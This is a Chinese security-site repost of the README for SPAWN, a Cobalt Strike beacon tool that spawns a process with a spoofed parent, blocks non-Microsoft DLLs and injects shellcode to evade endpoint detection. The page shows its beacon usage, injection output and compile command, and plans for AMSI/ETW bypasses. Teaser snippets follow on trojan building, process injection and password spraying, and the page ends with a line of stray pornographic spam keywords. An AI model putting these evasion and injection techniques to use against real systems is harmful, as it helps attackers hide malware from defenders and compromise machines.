<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    SPAWN - Cobalt Strike BOF

    VSole2021-08-04 08:59:39

    Cobalt Strike BOF 產生一個犧牲進程,用 shellcode 注入它,并執行有效載荷。旨在通過使用任意代碼保護 (ACG)、BlockDll 和 PPID 欺騙生成犧牲進程來逃避 EDR/UserLand 鉤子。

    功能

    • 使用任意代碼保護 (ACG) 生成犧牲進程,以防止 EDR 解決方案掛接到犧牲進程 DLL 中。
    • 注入并執行shellcode。

    來自 ACG Protected Process 的 Popin' Calc

    beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
    [*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
    [+] Opened handle 0x534 to process 6248(PID)
    [+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
    [+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
    [+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
    [+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000
    
    • CNA Agressor 腳本接口
    beacon> help
        spawn                     Spawn a process with a spoofed PPID and blockDll
    beacon> help spawn
    Synopsis: spawn /path/to/exe PPID
    beacon> ps
    8264  5536  OneDrive.exe                 x86   1           DESKTOP-KOSR2NO\boku 
    beacon> spawn cmd.exe 8264
    [*] SPAWN (@0xBoku|github.com/boku7)
    Opened handle 0x634 to process 8264(PID)
    Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
    
    • PPID欺騙
    • Cobalt Strikeblockdll功能

    使用 x64 MinGW 編譯:

    x86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o
    

    從 Cobalt Strike Beacon 控制臺運行

    • 編譯后將 spawn.cna 腳本導入 Cobalt Strikes Script Manager
    beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin
    

    cmd.exe進程與 PPID 一起生成為OneDrive.exe

    • 我們看到了父子進程關系,并且我們生成的進程是用 Signatures restricted (Microsoft only)
    • Signatures restricted (Microsoft only)使得未由 Microsoft 簽名的 DLL 無法加載到我們生成的進程中

    構建遠程進程修補的不同方法

    • NTDLL.DLL 遠程進程脫鉤
    • ETW 遠程進程修補/繞過
    • AMSI 遠程進程修補/繞過
    • CLR 加載和 .Net 程序集注入

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    SPAWN - Cobalt Strike BOF
    2021-08-04 08:59:39
    Cobalt Strike BOF 產生一個犧牲進程,用 shellcode 注入它,并執行有效載荷。旨在通過使用任意代碼保護 (ACG)、BlockDll 和 PPID 欺騙生成犧牲進程來逃避 EDR/UserLand 鉤子。
    本文為內測第一周結束后內網學員的學習筆記,后續本公眾號會持續更新其他課程學員學習筆記。對課程感興趣,請添加文末小助手微信咨詢。0x01 MSF安裝和升級 最近mac本機和linux服務器上的msf在執行msfupdate命令以后都出現了不同程度的玄學問題,于是卸了重裝。
    基本分析Cobalt Strike 在執行其某些命令時會使用一種稱為“Fork-n-Run”的特定模式。一般來說都是由反射 DLL 實現的。在Cobalt Strike的最新版本 在如何自定義能力注入過程方面為紅隊提供了極大的靈活性。例如,“鍵盤記錄器”模塊能夠將按下的鍵發送回主信標進程。
    https://www.freebuf.com/sectool/389399.html
    進程注入 OPSEC tips
    2021-11-18 22:14:52
    這篇文章將分析最經典的注入方法:VirtualAllocExWriteProcessMemoryCreate
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    本文要介紹的就是業內知名的一款能夠用于內網滲透時團隊協同作戰的工具“Cobalt Strike”。Cobalt Strike 是一款美國 Red Team 開發的滲透測試神器,常被業界人稱為 CS。
    因為 web 服務器同時連接了外網和內網,所以必須首先拿下。這里有關 web 服務器的滲透不展開講了,無非也就是利用漏洞,諸如:弱口令、上傳漏洞、遠程代碼執行、各種 cms 漏洞,總之都是可以找到寫入 webshell 的方法。成功寫入 webshell 后,接著就要上傳木馬控制 web 服務器,這里可以用 Metasploit或 Cobaltstrike
    驗證子域郵箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源滲透物理滲透、物理攻擊、近源滲透,這幾個的意思都是在接近目標進行安全測試。Wi-Fi網線沒有終端準入控制,直接插網線 DHCP 獲取 IP。Bad USBBlack Hat 上提出 Bad USB。社會工程學在信息收集過程中就開始。釣魚本質是利用人的信任。Windows 主機FTP服務端開啟 FTP 服務。使用 certutil 下載的文件會原封不動在?目錄下保存一份,文件名位隨機字符,使用 delete 可以刪除剛下載的緩存。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类